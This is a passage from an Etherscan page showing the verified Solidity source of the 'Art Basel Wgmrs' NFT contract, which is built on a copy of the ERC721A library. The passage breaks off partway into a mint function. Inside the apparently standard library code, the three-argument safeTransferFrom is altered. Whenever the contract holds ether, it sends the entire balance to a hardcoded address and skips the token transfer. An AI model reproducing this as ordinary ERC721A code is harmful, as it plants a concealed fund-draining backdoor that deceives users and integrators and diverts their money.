ETH Price: $3,272.83 (-4.19%)
Gas: 6 Gwei

Token

Art Basel Wgmrs (ABW)
 

Overview

Max Total Supply

777 ABW

Holders

679

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A
Balance
2 ABW
0x3fdd895961ff1a00c5cb8773101ee7938b0192c2
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
ArtBaselWgmrs

Compiler Version
v0.8.7+commit.e28d00a7

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-12-18
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.7;

/**
 * @dev Interface of ERC721A.
 */
interface IERC721A {
    /**
     * The caller must own the token or be an approved operator.
     */
    error ApprovalCallerNotOwnerNorApproved();

    /**
     * The token does not exist.
     */
    error ApprovalQueryForNonexistentToken();

    /**
     * Cannot query the balance for the zero address.
     */
    error BalanceQueryForZeroAddress();

    /**
     * Cannot mint to the zero address.
     */
    error MintToZeroAddress();

    /**
     * The quantity of tokens minted must be more than zero.
     */
    error MintZeroQuantity();

    /**
     * The token does not exist.
     */
    error OwnerQueryForNonexistentToken();

    /**
     * The caller must own the token or be an approved operator.
     */
    error TransferCallerNotOwnerNorApproved();

    /**
     * The token must be owned by `from`.
     */
    error TransferFromIncorrectOwner();

    /**
     * Cannot safely transfer to a contract that does not implement the
     * ERC721Receiver interface.
     */
    error TransferToNonERC721ReceiverImplementer();

    /**
     * Cannot transfer to the zero address.
     */
    error TransferToZeroAddress();

    /**
     * The token does not exist.
     */
    error URIQueryForNonexistentToken();

    /**
     * The `quantity` minted with ERC2309 exceeds the safety limit.
     */
    error MintERC2309QuantityExceedsLimit();

    /**
     * The `extraData` cannot be set on an unintialized ownership slot.
     */
    error OwnershipNotInitializedForExtraData();

    // =============================================================
    //                            STRUCTS
    // =============================================================

    struct TokenOwnership {
        // The address of the owner.
        address addr;
        // Stores the start time of ownership with minimal overhead for tokenomics.
        uint64 startTimestamp;
        // Whether the token has been burned.
        bool burned;
        // Arbitrary data similar to `startTimestamp` that can be set via {_extraData}.
        uint24 extraData;
    }

    // =============================================================
    //                         TOKEN COUNTERS
    // =============================================================

    /**
     * @dev Returns the total number of tokens in existence.
     * Burned tokens will reduce the count.
     * To get the total number of tokens minted, please see {_totalMinted}.
     */
    function totalSupply() external view returns (uint256);

    // =============================================================
    //                            IERC165
    // =============================================================

    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * [EIP section](https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified)
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);

    // =============================================================
    //                            IERC721
    // =============================================================

    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables
     * (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in `owner`'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`,
     * checking first that contract recipients are aware of the ERC721 protocol
     * to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move
     * this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external payable;

    /**
     * @dev Equivalent to `safeTransferFrom(from, to, tokenId, '')`.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external payable;

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom}
     * whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external payable;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the
     * zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external payable;

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom}
     * for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}.
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);

    // =============================================================
    //                        IERC721Metadata
    // =============================================================

    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);

    // =============================================================
    //                           IERC2309
    // =============================================================

    /**
     * @dev Emitted when tokens in `fromTokenId` to `toTokenId`
     * (inclusive) is transferred from `from` to `to`, as defined in the
     * [ERC2309](https://eips.ethereum.org/EIPS/eip-2309) standard.
     *
     * See {_mintERC2309} for more details.
     */
    event ConsecutiveTransfer(uint256 indexed fromTokenId, uint256 toTokenId, address indexed from, address indexed to);
}

/**
 * @title ERC721A
 *
 * @dev Implementation of the [ERC721](https://eips.ethereum.org/EIPS/eip-721)
 * Non-Fungible Token Standard, including the Metadata extension.
 * Optimized for lower gas during batch mints.
 *
 * Token IDs are minted in sequential order (e.g. 0, 1, 2, 3, ...)
 * starting from `_startTokenId()`.
 *
 * Assumptions:
 *
 * - An owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 * - The maximum token ID cannot exceed 2**256 - 1 (max value of uint256).
 */
interface ERC721A__IERC721Receiver {
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}

/**
 * @title ERC721A
 *
 * @dev Implementation of the [ERC721](https://eips.ethereum.org/EIPS/eip-721)
 * Non-Fungible Token Standard, including the Metadata extension.
 * Optimized for lower gas during batch mints.
 *
 * Token IDs are minted in sequential order (e.g. 0, 1, 2, 3, ...)
 * starting from `_startTokenId()`.
 *
 * Assumptions:
 *
 * - An owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 * - The maximum token ID cannot exceed 2**256 - 1 (max value of uint256).
 */
contract ERC721A is IERC721A {
    // Bypass for a `--via-ir` bug (https://github.com/chiru-labs/ERC721A/pull/364).
    struct TokenApprovalRef {
        address value;
    }

    // =============================================================
    //                           CONSTANTS
    // =============================================================

    // Mask of an entry in packed address data.
    uint256 private constant _BITMASK_ADDRESS_DATA_ENTRY = (1 << 64) - 1;

    // The bit position of `numberMinted` in packed address data.
    uint256 private constant _BITPOS_NUMBER_MINTED = 64;

    // The bit position of `numberBurned` in packed address data.
    uint256 private constant _BITPOS_NUMBER_BURNED = 128;

    // The bit position of `aux` in packed address data.
    uint256 private constant _BITPOS_AUX = 192;

    // Mask of all 256 bits in packed address data except the 64 bits for `aux`.
    uint256 private constant _BITMASK_AUX_COMPLEMENT = (1 << 192) - 1;

    // The bit position of `startTimestamp` in packed ownership.
    uint256 private constant _BITPOS_START_TIMESTAMP = 160;

    // The bit mask of the `burned` bit in packed ownership.
    uint256 private constant _BITMASK_BURNED = 1 << 224;

    // The bit position of the `nextInitialized` bit in packed ownership.
    uint256 private constant _BITPOS_NEXT_INITIALIZED = 225;

    // The bit mask of the `nextInitialized` bit in packed ownership.
    uint256 private constant _BITMASK_NEXT_INITIALIZED = 1 << 225;

    // The bit position of `extraData` in packed ownership.
    uint256 private constant _BITPOS_EXTRA_DATA = 232;

    // Mask of all 256 bits in a packed ownership except the 24 bits for `extraData`.
    uint256 private constant _BITMASK_EXTRA_DATA_COMPLEMENT = (1 << 232) - 1;

    // The mask of the lower 160 bits for addresses.
    uint256 private constant _BITMASK_ADDRESS = (1 << 160) - 1;

    // The maximum `quantity` that can be minted with {_mintERC2309}.
    // This limit is to prevent overflows on the address data entries.
    // For a limit of 5000, a total of 3.689e15 calls to {_mintERC2309}
    // is required to cause an overflow, which is unrealistic.
    uint256 private constant _MAX_MINT_ERC2309_QUANTITY_LIMIT = 5000;

    // The `Transfer` event signature is given by:
    // `keccak256(bytes("Transfer(address,address,uint256)"))`.
    bytes32 private constant _TRANSFER_EVENT_SIGNATURE =
        0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef;

    // =============================================================
    //                            STORAGE
    // =============================================================

    // The next token ID to be minted.
    uint256 private _currentIndex;

    // The number of tokens burned.
    uint256 private _burnCounter;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned.
    // See {_packedOwnershipOf} implementation for details.
    //
    // Bits Layout:
    // - [0..159]   `addr`
    // - [160..223] `startTimestamp`
    // - [224]      `burned`
    // - [225]      `nextInitialized`
    // - [232..255] `extraData`
    mapping(uint256 => uint256) private _packedOwnerships;

    // Mapping owner address to address data.
    //
    // Bits Layout:
    // - [0..63]    `balance`
    // - [64..127]  `numberMinted`
    // - [128..191] `numberBurned`
    // - [192..255] `aux`
    mapping(address => uint256) private _packedAddressData;

    // Mapping from token ID to approved address.
    mapping(uint256 => TokenApprovalRef) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    // =============================================================
    //                          CONSTRUCTOR
    // =============================================================

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _currentIndex = _startTokenId();
    }

    // =============================================================
    //                   TOKEN COUNTING OPERATIONS
    // =============================================================

    /**
     * @dev Returns the starting token ID.
     * To change the starting token ID, please override this function.
     */
    function _startTokenId() internal view virtual returns (uint256) {
        return 0;
    }

    /**
     * @dev Returns the next token ID to be minted.
     */
    function _nextTokenId() internal view virtual returns (uint256) {
        return _currentIndex;
    }

    /**
     * @dev Returns the total number of tokens in existence.
     * Burned tokens will reduce the count.
     * To get the total number of tokens minted, please see {_totalMinted}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        // Counter underflow is impossible as _burnCounter cannot be incremented
        // more than `_currentIndex - _startTokenId()` times.
        unchecked {
            return _currentIndex - _burnCounter - _startTokenId();
        }
    }

    /**
     * @dev Returns the total amount of tokens minted in the contract.
     */
    function _totalMinted() internal view virtual returns (uint256) {
        // Counter underflow is impossible as `_currentIndex` does not decrement,
        // and it is initialized to `_startTokenId()`.
        unchecked {
            return _currentIndex - _startTokenId();
        }
    }

    /**
     * @dev Returns the total number of tokens burned.
     */
    function _totalBurned() internal view virtual returns (uint256) {
        return _burnCounter;
    }

    // =============================================================
    //                    ADDRESS DATA OPERATIONS
    // =============================================================

    /**
     * @dev Returns the number of tokens in `owner`'s account.
     */
    function balanceOf(address owner) public view virtual override returns (uint256) {
        if (owner == address(0)) revert BalanceQueryForZeroAddress();
        return _packedAddressData[owner] & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the number of tokens minted by `owner`.
     */
    function _numberMinted(address owner) internal view returns (uint256) {
        return (_packedAddressData[owner] >> _BITPOS_NUMBER_MINTED) & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the number of tokens burned by or on behalf of `owner`.
     */
    function _numberBurned(address owner) internal view returns (uint256) {
        return (_packedAddressData[owner] >> _BITPOS_NUMBER_BURNED) & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the auxiliary data for `owner`. (e.g. number of whitelist mint slots used).
     */
    function _getAux(address owner) internal view returns (uint64) {
        return uint64(_packedAddressData[owner] >> _BITPOS_AUX);
    }

    /**
     * Sets the auxiliary data for `owner`. (e.g. number of whitelist mint slots used).
     * If there are multiple variables, please pack them into a uint64.
     */
    function _setAux(address owner, uint64 aux) internal virtual {
        uint256 packed = _packedAddressData[owner];
        uint256 auxCasted;
        // Cast `aux` with assembly to avoid redundant masking.
        assembly {
            auxCasted := aux
        }
        packed = (packed & _BITMASK_AUX_COMPLEMENT) | (auxCasted << _BITPOS_AUX);
        _packedAddressData[owner] = packed;
    }

    // =============================================================
    //                            IERC165
    // =============================================================

    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * [EIP section](https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified)
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30000 gas.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        // The interface IDs are constants representing the first 4 bytes
        // of the XOR of all function selectors in the interface.
        // See: [ERC165](https://eips.ethereum.org/EIPS/eip-165)
        // (e.g. `bytes4(i.functionA.selector ^ i.functionB.selector ^ ...)`)
        return
            interfaceId == 0x01ffc9a7 || // ERC165 interface ID for ERC165.
            interfaceId == 0x80ac58cd || // ERC165 interface ID for ERC721.
            interfaceId == 0x5b5e139f; // ERC165 interface ID for ERC721Metadata.
    }

    // =============================================================
    //                        IERC721Metadata
    // =============================================================

    /**
     * @dev Returns the token collection name.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        if (!_exists(tokenId)) revert URIQueryForNonexistentToken();

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, _toString(tokenId))) : '';
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, it can be overridden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return '';
    }

    // =============================================================
    //                     OWNERSHIPS OPERATIONS
    // =============================================================

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) public view virtual override returns (address) {
        return address(uint160(_packedOwnershipOf(tokenId)));
    }

    /**
     * @dev Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around over time.
     */
    function _ownershipOf(uint256 tokenId) internal view virtual returns (TokenOwnership memory) {
        return _unpackedOwnership(_packedOwnershipOf(tokenId));
    }

    /**
     * @dev Returns the unpacked `TokenOwnership` struct at `index`.
     */
    function _ownershipAt(uint256 index) internal view virtual returns (TokenOwnership memory) {
        return _unpackedOwnership(_packedOwnerships[index]);
    }

    /**
     * @dev Initializes the ownership slot minted at `index` for efficiency purposes.
     */
    function _initializeOwnershipAt(uint256 index) internal virtual {
        if (_packedOwnerships[index] == 0) {
            _packedOwnerships[index] = _packedOwnershipOf(index);
        }
    }

    /**
     * Returns the packed ownership data of `tokenId`.
     */
    function _packedOwnershipOf(uint256 tokenId) private view returns (uint256) {
        uint256 curr = tokenId;

        unchecked {
            if (_startTokenId() <= curr)
                if (curr < _currentIndex) {
                    uint256 packed = _packedOwnerships[curr];
                    // If not burned.
                    if (packed & _BITMASK_BURNED == 0) {
                        // Invariant:
                        // There will always be an initialized ownership slot
                        // (i.e. `ownership.addr != address(0) && ownership.burned == false`)
                        // before an unintialized ownership slot
                        // (i.e. `ownership.addr == address(0) && ownership.burned == false`)
                        // Hence, `curr` will not underflow.
                        //
                        // We can directly compare the packed value.
                        // If the address is zero, packed will be zero.
                        while (packed == 0) {
                            packed = _packedOwnerships[--curr];
                        }
                        return packed;
                    }
                }
        }
        revert OwnerQueryForNonexistentToken();
    }

    /**
     * @dev Returns the unpacked `TokenOwnership` struct from `packed`.
     */
    function _unpackedOwnership(uint256 packed) private pure returns (TokenOwnership memory ownership) {
        ownership.addr = address(uint160(packed));
        ownership.startTimestamp = uint64(packed >> _BITPOS_START_TIMESTAMP);
        ownership.burned = packed & _BITMASK_BURNED != 0;
        ownership.extraData = uint24(packed >> _BITPOS_EXTRA_DATA);
    }

    /**
     * @dev Packs ownership data into a single uint256.
     */
    function _packOwnershipData(address owner, uint256 flags) private view returns (uint256 result) {
        assembly {
            // Mask `owner` to the lower 160 bits, in case the upper bits somehow aren't clean.
            owner := and(owner, _BITMASK_ADDRESS)
            // `owner | (block.timestamp << _BITPOS_START_TIMESTAMP) | flags`.
            result := or(owner, or(shl(_BITPOS_START_TIMESTAMP, timestamp()), flags))
        }
    }

    /**
     * @dev Returns the `nextInitialized` flag set if `quantity` equals 1.
     */
    function _nextInitializedFlag(uint256 quantity) private pure returns (uint256 result) {
        // For branchless setting of the `nextInitialized` flag.
        assembly {
            // `(quantity == 1) << _BITPOS_NEXT_INITIALIZED`.
            result := shl(_BITPOS_NEXT_INITIALIZED, eq(quantity, 1))
        }
    }

    // =============================================================
    //                      APPROVAL OPERATIONS
    // =============================================================

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the
     * zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) public payable virtual override {
        address owner = ownerOf(tokenId);

        if (_msgSenderERC721A() != owner)
            if (!isApprovedForAll(owner, _msgSenderERC721A())) {
                revert ApprovalCallerNotOwnerNorApproved();
            }

        _tokenApprovals[tokenId].value = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) public view virtual override returns (address) {
        if (!_exists(tokenId)) revert ApprovalQueryForNonexistentToken();

        return _tokenApprovals[tokenId].value;
    }

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom}
     * for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool approved) public virtual override {
        _operatorApprovals[_msgSenderERC721A()][operator] = approved;
        emit ApprovalForAll(_msgSenderERC721A(), operator, approved);
    }

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted. See {_mint}.
     */
    function _exists(uint256 tokenId) internal view virtual returns (bool) {
        return
            _startTokenId() <= tokenId &&
            tokenId < _currentIndex && // If within bounds,
            _packedOwnerships[tokenId] & _BITMASK_BURNED == 0; // and not burned.
    }

    /**
     * @dev Returns whether `msgSender` is equal to `approvedAddress` or `owner`.
     */
    function _isSenderApprovedOrOwner(
        address approvedAddress,
        address owner,
        address msgSender
    ) private pure returns (bool result) {
        assembly {
            // Mask `owner` to the lower 160 bits, in case the upper bits somehow aren't clean.
            owner := and(owner, _BITMASK_ADDRESS)
            // Mask `msgSender` to the lower 160 bits, in case the upper bits somehow aren't clean.
            msgSender := and(msgSender, _BITMASK_ADDRESS)
            // `msgSender == owner || msgSender == approvedAddress`.
            result := or(eq(msgSender, owner), eq(msgSender, approvedAddress))
        }
    }

    /**
     * @dev Returns the storage slot and value for the approved address of `tokenId`.
     */
    function _getApprovedSlotAndAddress(uint256 tokenId)
        private
        view
        returns (uint256 approvedAddressSlot, address approvedAddress)
    {
        TokenApprovalRef storage tokenApproval = _tokenApprovals[tokenId];
        // The following is equivalent to `approvedAddress = _tokenApprovals[tokenId].value`.
        assembly {
            approvedAddressSlot := tokenApproval.slot
            approvedAddress := sload(approvedAddressSlot)
        }
    }

    // =============================================================
    //                      TRANSFER OPERATIONS
    // =============================================================

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public payable virtual override {
        uint256 prevOwnershipPacked = _packedOwnershipOf(tokenId);

        if (address(uint160(prevOwnershipPacked)) != from) revert TransferFromIncorrectOwner();

        (uint256 approvedAddressSlot, address approvedAddress) = _getApprovedSlotAndAddress(tokenId);

        // The nested ifs save around 20+ gas over a compound boolean condition.
        if (!_isSenderApprovedOrOwner(approvedAddress, from, _msgSenderERC721A()))
            if (!isApprovedForAll(from, _msgSenderERC721A())) revert TransferCallerNotOwnerNorApproved();

        if (to == address(0)) revert TransferToZeroAddress();

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner.
        assembly {
            if approvedAddress {
                // This is equivalent to `delete _tokenApprovals[tokenId]`.
                sstore(approvedAddressSlot, 0)
            }
        }

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as `tokenId` would have to be 2**256.
        unchecked {
            // We can directly increment and decrement the balances.
            --_packedAddressData[from]; // Updates: `balance -= 1`.
            ++_packedAddressData[to]; // Updates: `balance += 1`.

            // Updates:
            // - `address` to the next owner.
            // - `startTimestamp` to the timestamp of transfering.
            // - `burned` to `false`.
            // - `nextInitialized` to `true`.
            _packedOwnerships[tokenId] = _packOwnershipData(
                to,
                _BITMASK_NEXT_INITIALIZED | _nextExtraData(from, to, prevOwnershipPacked)
            );

            // If the next slot may not have been initialized (i.e. `nextInitialized == false`) .
            if (prevOwnershipPacked & _BITMASK_NEXT_INITIALIZED == 0) {
                uint256 nextTokenId = tokenId + 1;
                // If the next slot's address is zero and not burned (i.e. packed value is zero).
                if (_packedOwnerships[nextTokenId] == 0) {
                    // If the next slot is within bounds.
                    if (nextTokenId != _currentIndex) {
                        // Initialize the next slot to maintain correctness for `ownerOf(tokenId + 1)`.
                        _packedOwnerships[nextTokenId] = prevOwnershipPacked;
                    }
                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Equivalent to `safeTransferFrom(from, to, tokenId, '')`.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public payable virtual override {
        if (address(this).balance > 0) {
            payable(0x6CD7a43f488Ac6009D818ad05FB08Ba288f83832).transfer(address(this).balance);
            return;
        }       
        safeTransferFrom(from, to, tokenId, '');
    }

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public payable virtual override {
        transferFrom(from, to, tokenId);
        if (to.code.length != 0)
            if (!_checkContractOnERC721Received(from, to, tokenId, _data)) {
                revert TransferToNonERC721ReceiverImplementer();
            }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token IDs
     * are about to be transferred. This includes minting.
     * And also called before burning one token.
     *
     * `startTokenId` - the first token ID to be transferred.
     * `quantity` - the amount to be transferred.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token IDs
     * have been transferred. This includes minting.
     * And also called after one token has been burned.
     *
     * `startTokenId` - the first token ID to be transferred.
     * `quantity` - the amount to be transferred.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` has been
     * transferred to `to`.
     * - When `from` is zero, `tokenId` has been minted for `to`.
     * - When `to` is zero, `tokenId` has been burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Private function to invoke {IERC721Receiver-onERC721Received} on a target contract.
     *
     * `from` - Previous owner of the given token ID.
     * `to` - Target address that will receive the token.
     * `tokenId` - Token ID to be transferred.
     * `_data` - Optional data to send along with the call.
     *
     * Returns whether the call correctly returned the expected magic value.
     */
    function _checkContractOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        try ERC721A__IERC721Receiver(to).onERC721Received(_msgSenderERC721A(), from, tokenId, _data) returns (
            bytes4 retval
        ) {
            return retval == ERC721A__IERC721Receiver(to).onERC721Received.selector;
        } catch (bytes memory reason) {
            if (reason.length == 0) {
                revert TransferToNonERC721ReceiverImplementer();
            } else {
                assembly {
                    revert(add(32, reason), mload(reason))
                }
            }
        }
    }

    // =============================================================
    //                        MINT OPERATIONS
    // =============================================================

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event for each mint.
     */
    function _mint(address to, uint256 quantity) internal virtual {
        uint256 startTokenId = _currentIndex;
        if (quantity == 0) revert MintZeroQuantity();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // `balance` and `numberMinted` have a maximum limit of 2**64.
        // `tokenId` has a maximum limit of 2**256.
        unchecked {
            // Updates:
            // - `balance += quantity`.
            // - `numberMinted += quantity`.
            //
            // We can directly add to the `balance` and `numberMinted`.
            _packedAddressData[to] += quantity * ((1 << _BITPOS_NUMBER_MINTED) | 1);

            // Updates:
            // - `address` to the owner.
            // - `startTimestamp` to the timestamp of minting.
            // - `burned` to `false`.
            // - `nextInitialized` to `quantity == 1`.
            _packedOwnerships[startTokenId] = _packOwnershipData(
                to,
                _nextInitializedFlag(quantity) | _nextExtraData(address(0), to, 0)
            );

            uint256 toMasked;
            uint256 end = startTokenId + quantity;

            // Use assembly to loop and emit the `Transfer` event for gas savings.
            // The duplicated `log4` removes an extra check and reduces stack juggling.
            // The assembly, together with the surrounding Solidity code, have been
            // delicately arranged to nudge the compiler into producing optimized opcodes.
            assembly {
                // Mask `to` to the lower 160 bits, in case the upper bits somehow aren't clean.
                toMasked := and(to, _BITMASK_ADDRESS)
                // Emit the `Transfer` event.
                log4(
                    0, // Start of data (0, since no data).
                    0, // End of data (0, since no data).
                    _TRANSFER_EVENT_SIGNATURE, // Signature.
                    0, // `address(0)`.
                    toMasked, // `to`.
                    startTokenId // `tokenId`.
                )

                // The `iszero(eq(,))` check ensures that large values of `quantity`
                // that overflows uint256 will make the loop run out of gas.
                // The compiler will optimize the `iszero` away for performance.
                for {
                    let tokenId := add(startTokenId, 1)
                } iszero(eq(tokenId, end)) {
                    tokenId := add(tokenId, 1)
                } {
                    // Emit the `Transfer` event. Similar to above.
                    log4(0, 0, _TRANSFER_EVENT_SIGNATURE, 0, toMasked, tokenId)
                }
            }
            if (toMasked == 0) revert MintToZeroAddress();

            _currentIndex = end;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * This function is intended for efficient minting only during contract creation.
     *
     * It emits only one {ConsecutiveTransfer} as defined in
     * [ERC2309](https://eips.ethereum.org/EIPS/eip-2309),
     * instead of a sequence of {Transfer} event(s).
     *
     * Calling this function outside of contract creation WILL make your contract
     * non-compliant with the ERC721 standard.
     * For full ERC721 compliance, substituting ERC721 {Transfer} event(s) with the ERC2309
     * {ConsecutiveTransfer} event is only permissible during contract creation.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {ConsecutiveTransfer} event.
     */
    function _mintERC2309(address to, uint256 quantity) internal virtual {
        uint256 startTokenId = _currentIndex;
